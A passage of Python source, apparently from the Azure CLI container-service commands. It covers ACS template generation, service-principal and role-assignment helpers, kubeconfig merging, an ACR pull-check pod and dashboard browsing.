return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(
default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(
default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict(
{"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(
_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
def _get_user_assigned_identity_resource_id_regular_expression():
return re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
resource_id = resource_id.lower()
_re_user_assigned_identity_resource_id = _get_user_assigned_identity_resource_id_regular_expression()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
identity_name = match.group(3)
msi_client = get_msi_client(cli_ctx, subscription_id)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise ResourceNotFoundError("Identity {} not found.".format(resource_id))
raise ClientRequestError(ex.message)
return identity
raise InvalidArgumentValueError(
"Cannot parse identity name from provided resource id {}.".format(resource_id))
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).client_id
def _get_user_assigned_identity_object_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).principal_id
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for master pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
:param admin_password: The adminstration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(
name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(
windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
DeploymentProperties = cmd.get_models(
'DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(
template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
Deployment = cmd.get_models(
'Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
validation_poller = smc.begin_validate(
resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return smc.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, smc.begin_create_or_update, resource_group_name, deployment_name, deployment)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(
name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError(
'Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(
path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning(
'Failed to merge credentials to kube config file: %s', exc)
logger.warning(
'The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if not existing.get(key):
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError(
'failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
logger.warning(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.begin_create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError(
"service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
required_resource_access=required_resource_accesses)
try:
result = client.create(app_create_param, raw=True)
return result.output, result.response.headers["ocp-aad-session-key"]
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
try:
if key_creds:
client.update_key_credentials(object_id, key_creds)
if password_creds:
client.update_password_credentials(object_id, password_creds)
if reply_urls:
client.patch(object_id, ApplicationUpdateParameters(
reply_urls=reply_urls))
return
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(
resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(
cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(
role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
# TODO: track2/remove custom headers, depends on 'azure.mgmt.authorization'
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(
scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(
filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError(
"No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
def aks_check_acr(cmd, client, resource_group_name, name, acr):
if not which("kubectl"):
raise ValidationError("Can not find kubectl executable in PATH")
_, browse_path = tempfile.mkstemp()
aks_get_credentials(
cmd, client, resource_group_name, name, admin=False, path=browse_path
)
# Get kubectl minor version
kubectl_minor_version = -1
try:
cmd = f"kubectl version -o json --kubeconfig {browse_path}"
output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
jsonS, _ = output.communicate()
kubectl_version = json.loads(jsonS)
# Remove any non-numeric characters like + from minor version
kubectl_minor_version = int(re.sub(r"\D", "", kubectl_version["clientVersion"]["minor"]))
kubectl_server_minor_version = int(
kubectl_version["serverVersion"]["minor"])
kubectl_server_patch = int(
kubectl_version["serverVersion"]["gitVersion"].split(".")[-1])
if kubectl_server_minor_version < 17 or (kubectl_server_minor_version == 17 and kubectl_server_patch < 14):
logger.warning('There is a known issue for Kubernetes versions < 1.17.14 when connecting to '
'ACR using MSI. See https://github.com/kubernetes/kubernetes/pull/96355 for'
'more information.')
except subprocess.CalledProcessError as err:
raise ValidationError(
"Could not find kubectl minor version: {}".format(err))
if kubectl_minor_version == -1:
raise ValidationError("Failed to get kubectl version")
podName = "canipull-" + str(uuid.uuid4())
overrides = {
"spec": {
"restartPolicy": "Never",
"hostNetwork": True,
"containers": [
{
"securityContext": {"runAsUser": 0},
"name": podName,
"image": CONST_CANIPULL_IMAGE,
"args": ["-v6", acr],
"stdin": True,
"stdinOnce": True,
"tty": True,
"volumeMounts": [
{"name": "azurejson", "mountPath": "/etc/kubernetes"},
{"name": "sslcerts", "mountPath": "/etc/ssl/certs"},
],
}
],
"tolerations": [
{"key": "CriticalAddonsOnly", "operator": "Exists"},
{"effect": "NoExecute", "operator": "Exists"},
],
"volumes": [
{"name": "azurejson", "hostPath": {"path": "/etc/kubernetes"}},
{"name": "sslcerts", "hostPath": {"path": "/etc/ssl/certs"}},
],
"nodeSelector": {"kubernetes.io/os": "linux"},
}
}
try:
cmd = [
"kubectl",
"run",
"--kubeconfig",
browse_path,
"--rm",
"--quiet",
"--image",
CONST_CANIPULL_IMAGE,
"--overrides",
json.dumps(overrides),
"-it",
podName,
]
# Support kubectl versons < 1.18
if kubectl_minor_version < 18:
cmd += ["--generator=run-pod/v1"]
output = subprocess.check_output(
cmd,
universal_newlines=True,
)
except subprocess.CalledProcessError as err:
raise CLIError("Failed to check the ACR: {}".format(err))
if output:
print(output)
if os.getenv("PYTEST_CURRENT_TEST", None):
return output
else:
raise CLIError("Failed to check the ACR.")
# pylint: disable=too-many-statements,too-many-branches
def _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=resource_type,
operation_group='managed_clusters')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles
if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
ManagedClusterAddonProfile(enabled=False))
return_msg = None
# open portal view if addon is not enabled or k8s version >= 1.19.0
if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
subscription_id = get_subscription_id(cmd.cli_ctx)
dashboardURL = (
# Azure Portal URL (https://portal.azure.com for public cloud)
cmd.cli_ctx.cloud.endpoints.portal +
('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
'/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
)
if in_cloud_console():
logger.warning(
'To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
else:
logger.warning('Kubernetes resources view on %s', dashboardURL)
return_msg = "Kubernetes resources view on {}".format(dashboardURL)
if not disable_browser:
webbrowser.open_new_tab(dashboardURL)
return return_msg
# otherwise open the kube-dashboard addon
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
